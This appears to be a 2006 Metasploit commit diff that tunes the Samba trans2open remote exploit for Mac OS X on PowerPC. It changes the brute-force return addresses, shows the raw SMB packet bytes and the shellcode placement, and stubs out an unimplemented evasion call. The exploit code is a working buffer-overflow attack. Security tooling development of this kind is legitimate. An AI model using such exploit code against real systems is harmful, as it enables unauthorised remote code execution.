Working findtag + samba

Removed call to evasions that didnt have corresponding definition


git-svn-id: file:///home/svn/incoming/trunk@3501 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-02-04 21:04:50 +00:00
parent 2290b14c7d
commit 868d7bf561
3 changed files with 12 additions and 11 deletions

View File

@ -94,7 +94,8 @@ module Exploit::Remote::Tcp
})
# enable evasions on this socket
evasions(nsock)
# XXX implement evasions!!!!
# evasions(nsock)
# Set this socket to the global socket as necessary
self.sock = nsock if (global)

View File

@ -36,7 +36,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
'Arch' => ARCH_PPC,
'Targets' =>
[
['Stack Brute Force', { 'Rets' => [0xbffff3fc, 0xbfa00000, 512] } ],
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
],
'DisclosureDate' => 'Apr 7 2003',
@ -62,19 +62,19 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
pattern = Rex::Text.rand_text_english(1988)
# This stream covers the framepointer and the return address
pattern[1195, 64] = [curr_ret].pack('N') * 8
pattern[1195, 64] = [curr_ret].pack('N') * 16
# Stuff the shellcode into the request
pattern[3, payload.encoded.length] = payload.encoded
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
sock.put(trans)
handler
@ -82,6 +82,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
rescue EOFError
rescue => e
print_status("Caught exception: #{e.to_s}")
break
end
curr_ret -= target['Rets'][2]

View File

@ -50,7 +50,6 @@ module FindTag
#
def replace_var(raw, name, offset, pack)
if (name == 'TAG')
$stderr.puts "Replacing #{offset.to_s} " + raw[offset,2].unpack("H*")[0]
raw[offset, 2] = datastore[name][0,2]
return true
end